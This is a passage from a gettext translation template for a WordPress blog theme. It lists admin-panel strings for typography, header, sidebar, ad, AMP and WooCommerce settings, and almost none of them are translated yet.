backend/panels/typography.php:780 #, php-format msgid "" "Select a font size (px) for the single tagline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:148 backend/panels/typography.php:197 #: backend/panels/typography.php:246 backend/panels/typography.php:295 #: backend/panels/typography.php:344 backend/panels/typography.php:393 msgid "" "Select a font size (px) for this heading tag on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:155 backend/panels/typography.php:204 #: backend/panels/typography.php:253 backend/panels/typography.php:302 #: backend/panels/typography.php:351 backend/panels/typography.php:400 msgid "" "Select a font size (px) for this heading tag on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/single-post.php:206 msgid "Select a font style for the post hyperlinks." msgstr "" #: backend/panels/header.php:150 backend/panels/header.php:382 msgid "Select a footer menu to display at the bottom of this section." msgstr "" #: backend/single-metaboxes.php:425 msgid "" "Select a gallery layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/color.php:37 msgid "Select a global color in the dark mode." msgstr "" #: backend/panels/color.php:29 msgid "" "Select a global color, This setting apply to all links, menu, category " "overlays, main page and many contrasting elements." msgstr "" #: backend/panels/single-post.php:104 msgid "Select a global layout for the audio post format." msgstr "" #: backend/panels/single-post.php:133 msgid "Select a global layout for the gallery post format." msgstr "" #: backend/panels/single-post.php:67 msgid "Select a global layout for the video post format." msgstr "" #: backend/panels/page.php:31 msgid "Select a header style for the single page." msgstr "" #: backend/category-settings.php:57 msgid "Select a header style for this category." msgstr "" #: backend/panels/heading.php:105 msgid "Select a heading layout for the footer column widgets." msgstr "" #: backend/category-settings.php:190 backend/panels/blog-pages.php:212 #: backend/panels/bookmark.php:525 backend/panels/single-post.php:1312 msgid "Select a heading layout for the heading." msgstr "" #: backend/panels/heading.php:96 msgid "Select a heading layout for the sidebar widgets." msgstr "" #: backend/category-settings.php:31 backend/panels/design.php:45 msgid "" "Select a highlight color for the entry category to display in the post " "listing." msgstr "" #: backend/panels/single-post.php:516 msgid "Select a HTML tag for the single tagline to optimize your SEO settings." msgstr "" #: backend/panels/single-post.php:530 msgid "Select a HTML tag for the single tagline." msgstr "" #: backend/panels/bookmark.php:533 backend/panels/single-post.php:1320 msgid "Select a HTML tag for this heading." msgstr "" #: backend/category-settings.php:198 backend/panels/blog-pages.php:220 msgid "" "Select a HTML tag for this heading. Leave this option blank to set the " "default." msgstr "" #: backend/single-metaboxes.php:220 msgid "Select a HTML tag for this tagline." msgstr "" #: backend/panels/single-post.php:1337 msgid "Select a layout for the blog listing." msgstr "" #: backend/panels/block-classic.php:40 backend/panels/block-grid.php:40 #: backend/panels/block-grid.php:205 backend/panels/block-grid.php:370 #: backend/panels/block-grid.php:543 backend/panels/block-grid.php:730 #: backend/panels/block-list.php:48 backend/panels/block-list.php:221 #: backend/panels/block-list.php:402 backend/panels/block-list.php:597 #: backend/panels/blog-pages.php:365 backend/panels/blog-pages.php:852 #: backend/panels/blog-pages.php:1266 backend/panels/blog-pages.php:1674 #: backend/panels/blog-pages.php:2166 backend/panels/bookmark.php:265 #: backend/panels/bookmark.php:713 msgid "Select a layout for the entry category to display in the post listing." msgstr "" #: backend/panels/footer.php:91 msgid "Select a layout for the footer widget area." msgstr "" #: backend/panels/header.php:341 msgid "Select a layout for the mobile header." msgstr "" #: backend/panels/header.php:548 msgid "Select a layout for the sign in trigger button." msgstr "" #: backend/single-metaboxes.php:723 msgid "Select a layout for the table of contents of this post." msgstr "" #: backend/panels/table-contents.php:111 msgid "Select a layout for the table of contents." msgstr "" #: backend/panels/page.php:43 backend/panels/single-post.php:183 #: backend/single-metaboxes.php:70 msgid "Select a max-width for the content area without sidebar." msgstr "" #: backend/panels/footer.php:200 msgid "Select a menu to display in the footer copyright bar." msgstr "" #: backend/panels/newsletter.php:94 msgid "Select a mode to display the newsletter popup." msgstr "" #: backend/panels/single-post.php:1368 msgid "Select a pagination type for the related section." msgstr "" #: backend/panels/block-list.php:40 backend/panels/block-list.php:213 #: backend/panels/block-list.php:394 backend/panels/block-list.php:589 msgid "Select a position for the featured image. " msgstr "" #: backend/panels/login.php:37 msgid "Select a position for the login form." msgstr "" #: backend/single-metaboxes.php:89 msgid "" "Select a position for the sidebar of this page. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:448 msgid "" "Select a position for the sidebar of this post. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/panels/single-post.php:442 msgid "" "Select a position for the single sidebar. You can set an individual sidebar " "position for each post in the post editor page." msgstr "" #: backend/panels/privacy.php:22 msgid "Select a position to display the privacy box." msgstr "" #: backend/single-metaboxes.php:275 msgid "Select a Primary Category for this post." msgstr "" #: backend/panels/heading.php:67 backend/panels/heading.php:152 msgid "Select a primary color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:50 backend/panels/heading.php:135 msgid "Select a primary color for the heading." msgstr "" #: backend/panels/woocommerce.php:117 msgid "" "Select a sidebar for product category and archive pages if you enabled the " "sidebar." msgstr "" #: backend/panels/woocommerce.php:88 msgid "Select a sidebar for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:109 msgid "" "Select a sidebar position for product category and archive pages if you " "enabled the sidebar." msgstr "" #: backend/panels/blog-pages.php:306 backend/panels/blog-pages.php:793 #: backend/panels/blog-pages.php:1207 backend/panels/blog-pages.php:1615 #: backend/panels/bookmark.php:209 msgid "Select a sidebar position or disable it for the latest blog section" msgstr "" #: backend/category-settings.php:296 msgid "Select a sidebar position or disable it for the latest blog section." msgstr "" #: backend/panels/blog-pages.php:2107 msgid "Select a sidebar position or disable it for the search result listing." msgstr "" #: backend/panels/page.php:67 msgid "Select a sidebar position or disable it for the single page." msgstr "" #: backend/panels/bookmark.php:657 msgid "Select a sidebar position or disable it for this section." msgstr "" #: backend/panels/single-post.php:1556 msgid "Select a site header style for the single post." msgstr "" #: backend/single-metaboxes.php:114 msgid "Select a site header style for this page" msgstr "" #: backend/single-metaboxes.php:891 msgid "Select a site header style for this post." msgstr "" #: backend/panels/amp.php:329 backend/panels/amp.php:389 #: backend/panels/amp.php:449 backend/panels/amp.php:510 #: backend/panels/amp.php:570 msgid "Select a size for this ad." msgstr "" #: backend/panels/ads.php:142 backend/panels/ads.php:331 msgid "Select a size on the desktop device." msgstr "" #: backend/panels/ads.php:158 backend/panels/ads.php:347 msgid "Select a size on the mobile device." msgstr "" #: backend/panels/ads.php:150 backend/panels/ads.php:339 msgid "Select a size on the tablet device." msgstr "" #: backend/category-settings.php:283 msgid "Select a spacing between columns for the blog listing layout." msgstr "" #: backend/panels/blog-pages.php:283 backend/panels/blog-pages.php:770 #: backend/panels/blog-pages.php:1184 backend/panels/blog-pages.php:1592 #: backend/panels/blog-pages.php:2084 backend/panels/bookmark.php:187 #: backend/panels/bookmark.php:627 backend/panels/bookmark.php:635 msgid "Select a spacing between columns." msgstr "" #: backend/single-metaboxes.php:305 msgid "" "Select a standard layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/header-style.php:239 backend/panels/header-style.php:528 #: backend/panels/header-style.php:794 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header in the dark mode." msgstr "" #: backend/panels/header-style.php:161 backend/panels/header-style.php:450 #: backend/panels/header-style.php:716 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header." msgstr "" #: backend/panels/header-style.php:269 msgid "" "Select a text color for displaying in the navigation bar of the transparent " "header." msgstr "" #: backend/panels/header-style.php:203 backend/panels/header-style.php:492 #: backend/panels/header-style.php:758 msgid "" "Select a text color for displaying in the navigation bar of this header in " "the dark mode." msgstr "" #: backend/panels/header-style.php:125 backend/panels/header-style.php:413 #: backend/panels/header-style.php:680 msgid "" "Select a text color for displaying in the navigation bar of this header." msgstr "" #: backend/panels/header.php:494 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:441 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section." msgstr "" #: backend/category-settings.php:45 backend/panels/design.php:61 msgid "" "Select a text color for the entry category to display in the post listing in " "the dark mode." msgstr "" #: backend/category-settings.php:38 backend/panels/design.php:53 msgid "" "Select a text color for the entry category to display in the post listing. " "Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:474 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header in the dark mode." msgstr "" #: backend/panels/header.php:421 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header." msgstr "" #: backend/panels/footer.php:62 msgid "Select a text color scheme for the footer." msgstr "" #: backend/panels/header.php:285 msgid "Select a text color scheme to fit with the sub menu background." msgstr "" #: backend/panels/header-style.php:211 backend/panels/header-style.php:247 #: backend/panels/header-style.php:500 backend/panels/header-style.php:536 #: backend/panels/header-style.php:766 backend/panels/header-style.php:802 msgid "Select a text color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:133 backend/panels/header-style.php:169 #: backend/panels/header-style.php:277 backend/panels/header-style.php:421 #: backend/panels/header-style.php:458 backend/panels/header-style.php:688 #: backend/panels/header-style.php:724 msgid "Select a text color when hovering." msgstr "" #: backend/category-settings.php:434 backend/panels/block-classic.php:121 #: backend/panels/block-grid.php:121 backend/panels/block-grid.php:286 #: backend/panels/block-grid.php:451 backend/panels/block-grid.php:624 #: backend/panels/block-grid.php:811 backend/panels/block-list.php:129 #: backend/panels/block-list.php:302 backend/panels/block-list.php:483 #: backend/panels/block-list.php:678 backend/panels/blog-pages.php:461 #: backend/panels/blog-pages.php:948 backend/panels/blog-pages.php:1362 #: backend/panels/blog-pages.php:1770 backend/panels/blog-pages.php:2262 #: backend/panels/bookmark.php:360 backend/panels/bookmark.php:808 msgid "Select a title HTML tag for the post title." msgstr "" #: backend/panels/heading.php:113 msgid "Select a title HTML tag for the sidebar widget heading." msgstr "" #: backend/panels/ads.php:238 msgid "Select a top and bottom spacing for the advert." msgstr "" #: backend/single-metaboxes.php:57 msgid "" "Select a top header style for this page. This option is used for the single " "page (not Elementor page)." msgstr "" #: backend/single-metaboxes.php:504 msgid "Select a type of review for this post." msgstr "" #: backend/single-metaboxes.php:323 msgid "" "Select a video layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:604 msgid "Select a website header style for the blog page." msgstr "" #: backend/panels/blog-pages.php:38 msgid "Select a website header style for the category pages." msgstr "" #: backend/panels/blog-pages.php:1922 msgid "Select a website header style for the search page." msgstr "" #: backend/panels/header-style.php:57 backend/panels/header-style.php:351 #: backend/panels/header-style.php:602 msgid "Select a width style for this header." msgstr "" #: backend/panels/ads.php:78 msgid "Select ad settings for displaying at the top of your website." msgstr "" #: backend/panels/ads.php:266 msgid "Select ad settings for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:16 msgid "Select ad settings for your website." msgstr "" #: backend/panels/header.php:699 msgid "Select background color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:683 msgid "Select background color for the bar." msgstr "" #: backend/panels/blog-pages.php:1560 msgid "Select blog listing layout for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1152 msgid "Select blog listing layout for the author pages." msgstr "" #: backend/panels/blog-pages.php:738 msgid "Select blog listing layout for the blog." msgstr "" #: backend/panels/blog-pages.php:251 msgid "Select blog listing layout for the category pages." msgstr "" #: backend/panels/bookmark.php:155 msgid "Select blog listing layout for the saved pages." msgstr "" #: backend/panels/blog-pages.php:2052 msgid "Select blog listing layout for the search result listing." msgstr "" #: backend/category-settings.php:239 msgid "Select blog listing layout for this category." msgstr "" #: backend/panels/bookmark.php:595 msgid "Select blog listing layout for this section." msgstr "" #: backend/panels/color.php:16 msgid "" "Select colors for your website. To organize the panel and make it easy to " "use, you may also see color settings for each elements in it's panel." msgstr "" #: backend/panels/header.php:127 msgid "Select columns per row for this section." msgstr "" #: backend/panels/color.php:66 msgid "Select dark accent color in the dark mode." msgstr "" #: backend/panels/block-classic.php:148 backend/panels/block-grid.php:148 #: backend/panels/block-grid.php:313 backend/panels/block-grid.php:478 #: backend/panels/block-grid.php:651 backend/panels/block-grid.php:838 #: backend/panels/block-list.php:156 backend/panels/block-list.php:329 #: backend/panels/block-list.php:510 backend/panels/block-list.php:705 msgid "" "Select entry meta tags you would like to hide on the mobile devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/block-classic.php:139 backend/panels/block-grid.php:139 #: backend/panels/block-grid.php:304 backend/panels/block-grid.php:469 #: backend/panels/block-grid.php:642 backend/panels/block-grid.php:829 #: backend/panels/block-list.php:147 backend/panels/block-list.php:320 #: backend/panels/block-list.php:501 backend/panels/block-list.php:696 msgid "" "Select entry meta tags you would like to hide on the tablet devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/bookmark.php:404 msgid "" "Select entry meta you would like to hide on the mobile devices. In case long " "meta it would be useful." msgstr "" #: backend/panels/typography.php:999 msgid "" "Select font for mobile quick access menu items for displaying in the mobile " "device." msgstr "" #: backend/panels/typography.php:925 msgid "Select font for sub-level menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:970 msgid "Select font for sub-level menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:1112 msgid "Select font for the default archives, categories and menu fonts." msgstr "" #: backend/panels/typography.php:424 msgid "Select font for the entry category element." msgstr "" #: backend/panels/typography.php:124 msgid "" "Select font for the H1 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:173 msgid "" "Select font for the H2 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:222 msgid "" "Select font for the H3 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:271 msgid "" "Select font for the H4 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:320 msgid "" "Select font for the H5 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:369 msgid "" "Select font for the H6 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:581 msgid "" "Select font for the input, textarea and button. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:909 msgid "Select font for top menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:954 msgid "Select font for top menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:78 msgid "Select font sizes for the excerpt in the post listing." msgstr "" #: backend/panels/typography.php:473 msgid "" "Select font values for entry meta info: date, view, comment... Those options " "will not apply to the author meta." msgstr "" #: backend/panels/typography.php:896 msgid "Select font values for menus on the website header." msgstr "" #: backend/panels/typography.php:686 msgid "" "Select font values for Single Headline (Single Post Title) and Single " "Tagline (Single Sub Title)." msgstr "" #: backend/panels/typography.php:489 msgid "" "Select font values for the author, category meta, review description and " "sponsored brand." msgstr "" #: backend/panels/typography.php:1033 msgid "Select font values for the block heading." msgstr "" #: backend/panels/typography.php:813 msgid "Select font values for the block quote." msgstr "" #: backend/panels/typography.php:848 msgid "" "Select font values for the breadcrumb bar. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:1099 msgid "" "Select font values for the default widgets, apply to the archive, category " "widgets..." msgstr "" #: backend/panels/typography.php:418 msgid "" "Select font values for the entry category (category icon) in the post " "listing." msgstr "" #: backend/panels/typography.php:130 msgid "Select font values for the H1 tag and [ CSS classname: .h1]" msgstr "" #: backend/panels/typography.php:179 msgid "Select font values for the H2 tag and [ CSS classname: .h2]" msgstr "" #: backend/panels/typography.php:228 msgid "Select font values for the H3 tag and [ CSS classname: .h3]" msgstr "" #: backend/panels/typography.php:277 msgid "Select font values for the H4 tag and [ CSS classname: .h4]" msgstr "" #: backend/panels/typography.php:326 msgid "Select font values for the H5 tag and [ CSS classname: .h5]" msgstr "" #: backend/panels/typography.php:375 msgid "Select font values for the H6 tag and [ CSS classname: .h6]" msgstr "" #: backend/panels/typography.php:467 msgid "" "Select font values for the post entry meta. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:539 msgid "Select font values for the read more button" msgstr "" #: backend/panels/typography.php:533 msgid "Select font values for the read more button." msgstr "" #: backend/panels/typography.php:705 msgid "" "Select font values for the single headline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:762 msgid "" "Select font values for the single tagline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:30 msgid "" "Select font values for your website. The settings below apply to almost " "content elements on the website." msgstr "" #: backend/panels/bookmark.php:30 msgid "Select general settings for the bookmark system." msgstr "" #: backend/panels/design.php:569 msgid "Select hover effect settings for your website." msgstr "" #: backend/panels/single-post.php:30 msgid "Select layouts for the single post that based on the post formats." msgstr "" #: backend/category-settings.php:409 backend/panels/block-classic.php:91 #: backend/panels/block-grid.php:91 backend/panels/block-grid.php:256 #: backend/panels/block-grid.php:421 backend/panels/block-grid.php:594 #: backend/panels/block-grid.php:781 backend/panels/block-list.php:99 #: backend/panels/block-list.php:272 backend/panels/block-list.php:453 #: backend/panels/block-list.php:648 backend/panels/blog-pages.php:436 #: backend/panels/blog-pages.php:923 backend/panels/blog-pages.php:1337 #: backend/panels/blog-pages.php:1745 backend/panels/blog-pages.php:2237 #: backend/panels/bookmark.php:335 backend/panels/bookmark.php:783 msgid "select max length of the post excerpt." msgstr "" #: backend/panels/header.php:204 msgid "Select mode for the search button when clicking on." msgstr "" #: backend/single-metaboxes.php:130 msgid "Select navigation bar style for the header of this page." msgstr "" #: backend/single-metaboxes.php:907 msgid "Select navigation bar style for the header of this post." msgstr "" #: backend/panels/blog-pages.php:612 msgid "Select navigation bar style for the site header in the blog index page." msgstr "" #: backend/panels/blog-pages.php:46 msgid "Select navigation bar style for the site header in the category pages." msgstr "" #: backend/panels/blog-pages.php:1930 msgid "Select navigation bar style for the site header in the search page." msgstr "" #: backend/panels/header-style.php:69 backend/panels/header-style.php:614 msgid "Select navigation bar style for these header styles." msgstr "" #: backend/panels/single-post.php:1362 msgid "Select number of posts to show at once." msgstr "" #: backend/panels/woocommerce.php:72 msgid "" "Select number of products per page, leave blank if you want to set as " "Settings default." msgstr "" #: backend/panels/login.php:13 msgid "Select option for the login screen page." msgstr "" #: backend/panels/single-post.php:157 msgid "Select options for content area." msgstr "" #: backend/panels/single-post.php:1426 msgid "Select options for the ajax load next posts feature." msgstr "" #: backend/panels/header.php:115 msgid "" "Select options for the more menu and enable/disable it for each header style." msgstr "" #: backend/panels/privacy.php:8 msgid "Select options for the privacy notice bar." msgstr "" #: backend/panels/reaction.php:17 msgid "Select options for the reaction section." msgstr "" #: backend/panels/single-post.php:1251 msgid "" "Select options for the related and popular section at the footer of the " "single post page." msgstr "" #: backend/panels/single-post.php:1158 msgid "Select options for the review system." msgstr "" #: backend/panels/woocommerce.php:45 msgid "Select options for the shop and archive and single product pages." msgstr "" #: backend/panels/woocommerce.php:29 msgid "Select options for the shop." msgstr "" #: backend/panels/footer.php:16 msgid "" "Select options for your website footer. Navigate to Appearance > Widgets to " "add widgets to footer sections." msgstr "" #: backend/panels/header.php:17 msgid "Select options for your website header." msgstr "" #: backend/panels/optimized.php:15 msgid "Select options to optimize your website speed." msgstr "" #: backend/panels/logo.php:55 msgid "" "Select or upload a light logo for displaying in the dark mode. It should be " "same dimensions with the site logo." msgstr "" #: backend/panels/logo.php:71 msgid "" "Select or upload a light retina logo for displaying in the dark mode. It " "should be same dimensions with the retina site logo" msgstr "" #: backend/panels/logo.php:150 msgid "Select or upload bookmarklet icons for iOS and Android devices." msgstr "" #: backend/panels/logo.php:86 msgid "Select or upload logos for displaying in the mobile device." msgstr "" #: backend/panels/logo.php:116 msgid "Select or upload logos for displaying in the transparent headers." msgstr "" #: backend/panels/logo.php:63 msgid "" "Select or upload retina (2x) logo. Recommended logo height value is 120px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/logo.php:47 msgid "" "Select or upload site logo. Recommended logo height value is 60px, allowed " "extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/blog-pages.php:1857 msgid "Select pagination type for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1449 msgid "Select pagination type for the author pages." msgstr "" #: backend/panels/blog-pages.php:1036 msgid "Select pagination type for the blog." msgstr "" #: backend/panels/blog-pages.php:548 msgid "Select pagination type for the category pages." msgstr "" #: backend/panels/blog-pages.php:2349 msgid "Select pagination type for the search result listing." msgstr "" #: backend/category-settings.php:226 msgid "Select pagination type for this category." msgstr "" #: backend/panels/bookmark.php:570 msgid "Select pagination type for this section." msgstr "" #: backend/panels/design.php:255 msgid "Select position for the custom meta label at the beginning or end." msgstr "" #: backend/panels/design.php:314 msgid "Select position to crop the featured image." msgstr "" #: backend/panels/blog-pages.php:1538 msgid "" "Select posts per page for the archives. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:1129 msgid "" "Select posts per page for the authors. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:714 msgid "" "Select posts per page for the blog. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:178 msgid "" "Select posts per page for the categories. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:2030 msgid "" "Select posts per page for the search result listing. Leave this option blank " "to set the default." msgstr "" #: backend/category-settings.php:170 msgid "" "Select posts per page for this category. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:562 msgid "Select posts per page for this section." msgstr "" #: backend/single-metaboxes.php:271 msgid "Select Primary Category" msgstr "" #: backend/panels/reaction.php:38 msgid "Select reaction items you would like to show." msgstr "" #: backend/panels/optimized.php:108 msgid "" "Select SEO options for your website. This panel helps your website optimized " "for SEO and appear better on the search engines." msgstr "" #: backend/panels/amp.php:278 msgid "Select setting for ads in AMP mode." msgstr "" #: backend/panels/amp.php:248 msgid "Select setting for auto ads in AMP mode." msgstr "" #: backend/panels/amp.php:172 msgid "Select setting for the single post your website in AMP mode." msgstr "" #: backend/panels/amp.php:29 backend/panels/amp.php:41 msgid "Select setting for your website in AMP mode." msgstr "" #: backend/panels/design.php:419 msgid "Select settings for post sliders on your website." msgstr "" #: backend/panels/header.php:176 msgid "Select settings for search form to display in the website header." msgstr "" #: backend/panels/table-contents.php:16 msgid "Select settings for table of contents." msgstr "" #: backend/panels/bookmark.php:16 msgid "Select settings for the bookmark system." msgstr "" #: backend/panels/single-post.php:1205 msgid "Select settings for the comment box." msgstr "" #: backend/panels/dark-mode.php:17 msgid "Select settings for the dark mode." msgstr "" #: backend/panels/single-post.php:472 msgid "Select settings for the entry category." msgstr "" #: backend/category-settings.php:346 backend/panels/block-classic.php:50 #: backend/panels/block-grid.php:50 backend/panels/block-grid.php:215 #: backend/panels/block-grid.php:380 backend/panels/block-grid.php:553 #: backend/panels/block-grid.php:740 backend/panels/block-list.php:58 #: backend/panels/block-list.php:231 backend/panels/block-list.php:412 #: backend/panels/block-list.php:607 backend/panels/blog-pages.php:375 #: backend/panels/blog-pages.php:862 backend/panels/blog-pages.php:1276 #: backend/panels/blog-pages.php:1684 backend/panels/blog-pages.php:2176 #: backend/panels/bookmark.php:274 backend/panels/bookmark.php:722 msgid "Select settings for the entry meta bar." msgstr "" #: backend/panels/newsletter.php:15 msgid "Select settings for the popup newsletter." msgstr "" #: backend/panels/header.php:520 msgid "Select settings for the popup sign in form." msgstr "" #: backend/category-settings.php:398 msgid "Select settings for the post excerpt." msgstr "" #: backend/panels/design.php:296 msgid "Select settings for the post featured image on your website." msgstr "" #: backend/panels/design.php:536 msgid "" "Select settings for the read more button on your website. You can " "enable/disable this part per module via Modules Design section." msgstr "" #: backend/panels/bookmark.php:90 msgid "Select settings for the reading list section." msgstr "" #: backend/panels/bookmark.php:504 msgid "Select settings for the recommended section." msgstr "" #: backend/panels/single-post.php:426 msgid "Select settings for the single sidebar." msgstr "" #: backend/panels/single-post.php:1125 msgid "Select settings for the sponsored posts." msgstr "" #: backend/panels/bookmark.php:440 msgid "Select settings for the user interests section." msgstr "" #: backend/panels/design.php:471 msgid "Select settings for your post entry meta." msgstr "" #: backend/panels/sidebar.php:8 msgid "" "Select settings for your website sidebars, The settings below apply to all " "sidebars." msgstr "" #: backend/panels/woocommerce.php:80 msgid "Select sidebar position for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/single-post.php:692 msgid "Select socials you would like to show the share button." msgstr "" #: backend/panels/single-post.php:562 msgid "Select styles, layouts and other settings for the single post meta." msgstr "" #: backend/panels/woocommerce.php:173 msgid "Select styling options of your shop." msgstr "" #: backend/panels/header.php:707 msgid "Select text color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:691 msgid "Select text color for the bar." msgstr "" #: backend/panels/sidebar.php:27 msgid "Select the default sidebar position for your website." msgstr "" #: backend/panels/header.php:51 msgid "Select the global header style for your website header." msgstr "" #: backend/panels/header.php:34 msgid "Select the style and other settings for your website header." msgstr "" #: backend/category-settings.php:259 msgid "" "Select total columns to show per row for the blog listing layout on the " "desktop device." msgstr "" #: backend/category-settings.php:275 msgid "" "Select total columns to show per row for the blog listing layout on the " "mobile device." msgstr "" #: backend/category-settings.php:267 msgid "" "Select total columns to show per row for the blog listing layout on the " "tablet device." msgstr "" #: backend/panels/blog-pages.php:275 backend/panels/blog-pages.php:762 #: backend/panels/blog-pages.php:1176 backend/panels/blog-pages.php:1584 #: backend/panels/blog-pages.php:2076 backend/panels/bookmark.php:179 #: backend/panels/bookmark.php:619 msgid "Select total columns to show per row on the mobile device." msgstr "" #: backend/panels/blog-pages.php:267 backend/panels/blog-pages.php:754 #: backend/panels/blog-pages.php:1168 backend/panels/blog-pages.php:1576 #: backend/panels/blog-pages.php:2068 backend/panels/bookmark.php:171 #: backend/panels/bookmark.php:611 msgid "Select total columns to show per row on the tablet device." msgstr "" #: backend/panels/blog-pages.php:259 backend/panels/blog-pages.php:746 #: backend/panels/blog-pages.php:1160 backend/panels/blog-pages.php:1568 #: backend/panels/blog-pages.php:2060 backend/panels/bookmark.php:163 #: backend/panels/bookmark.php:603 msgid "Select total columns to show per row." msgstr "" #: backend/panels/woocommerce.php:148 msgid "" "Select total related product to show at once. leave blank if you want to set " "as default." msgstr "" #: backend/panels/amp.php:482 backend/panels/amp.php:542 msgid "Select your ad type to display at the bottom single content." msgstr "" #: backend/panels/amp.php:361 msgid "Select your ad type to display at the footer." msgstr "" #: backend/panels/amp.php:301 msgid "Select your ad type to display at the header." msgstr "" #: backend/panels/amp.php:421 msgid "Select your ad type to display at the top single content." msgstr "" #: backend/single-metaboxes.php:398 msgid "Self-Hosted Audio" msgstr "" #: backend/single-metaboxes.php:350 msgid "Self-Hosted Video" msgstr "" #: backend/panels/optimized.php:107 msgid "SEO Optimized" msgstr "" #: backend/panels/optimized.php:115 msgid "SEO Snippets" msgstr "" #: backend/panels/dark-mode.php:43 msgid "" "Set the dark mode as the default color scheme when users visit your website " "a the first time." msgstr "" #: backend/panels/ads.php:287 msgid "Setup below settings corresponding to your ad type." msgstr "" #: backend/panels/design.php:231 msgid "" "Setup your custom meta to display in the post listing and single post page." msgstr "" #: backend/configs.php:875 backend/panels/blog-pages.php:50 #: backend/panels/blog-pages.php:616 backend/panels/blog-pages.php:1934 #: backend/panels/header-style.php:71 backend/panels/header-style.php:616 #: backend/single-metaboxes.php:133 backend/single-metaboxes.php:910 msgid "Shadow" msgstr "" #: templates/single/templates.php:269 msgid "SHARE" msgstr "" #: templates/single/templates.php:323 templates/single/templates.php:1532 msgid "Share" msgstr "Compartilhar" #: backend/panels/single-post.php:1507 msgid "Share on Facebook" msgstr "" #: backend/panels/single-post.php:1523 msgid "Share on Reddit" msgstr "" #: backend/panels/single-post.php:690 msgid "Share on Socials" msgstr "" #: backend/panels/single-post.php:1515 msgid "Share on Twitter" msgstr "" #: templates/single/templates.php:808 msgid "Share this Article" msgstr "" #: backend/panels/woocommerce.php:102 msgid "Shop - Archive Pages Options" msgstr "" #: backend/panels/woocommerce.php:54 msgid "Shop Page Options" msgstr "" #: backend/panels/woocommerce.php:87 msgid "Shop Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:79 msgid "Shop Sidebar Position" msgstr "" #: backend/panels/optimized.php:182 msgid "" "Short description will display when searching your main site URL. Leave " "blank if you use 3rd plugins." msgstr "" #: backend/panels/header.php:732 msgid "Show a cart icon at the website header." msgstr "" #: backend/panels/single-post.php:1565 msgid "" "Show a font size icon that give visitors of your site the option to change " "the font size of your text." msgstr "" #: backend/panels/footer.php:54 msgid "Show a gray border a the top footer." msgstr "" #: backend/panels/design.php:550 msgid "Show a icon after the read more label." msgstr "" #: backend/panels/ads.php:455 msgid "Show ads or any shortcode in the slide up footer section." msgstr "" #: backend/panels/single-post.php:1441 msgid "Show Continue Reading" msgstr "" #: backend/panels/footer.php:107 msgid "Show gray borders between widget columns." msgstr "" #: backend/panels/table-contents.php:148 msgid "Show Hierarchy" msgstr "" #: backend/category-settings.php:144 backend/panels/blog-pages.php:134 #: backend/panels/blog-pages.php:671 msgid "Show in all pages" msgstr "" #: backend/category-settings.php:143 backend/panels/blog-pages.php:133 #: backend/panels/blog-pages.php:670 msgid "Show in the first page" msgstr "" #: backend/panels/header.php:739 msgid "Show mini cart icon in the header." msgstr "" #: backend/panels/header.php:747 msgid "Show mini cart icon in the mobile header." msgstr "" #: backend/panels/single-post.php:1373 includes/menu.php:244 #: includes/menu.php:297 templates/header/templates.php:701 #: templates/parts.php:326 msgid "Show More" msgstr "" #: backend/panels/table-contents.php:156 msgid "Show Number list" msgstr "" #: backend/panels/woocommerce.php:181 msgid "Show Percentage Saved" msgstr "" #: backend/panels/woocommerce.php:137 msgid "Show Review Box" msgstr "" 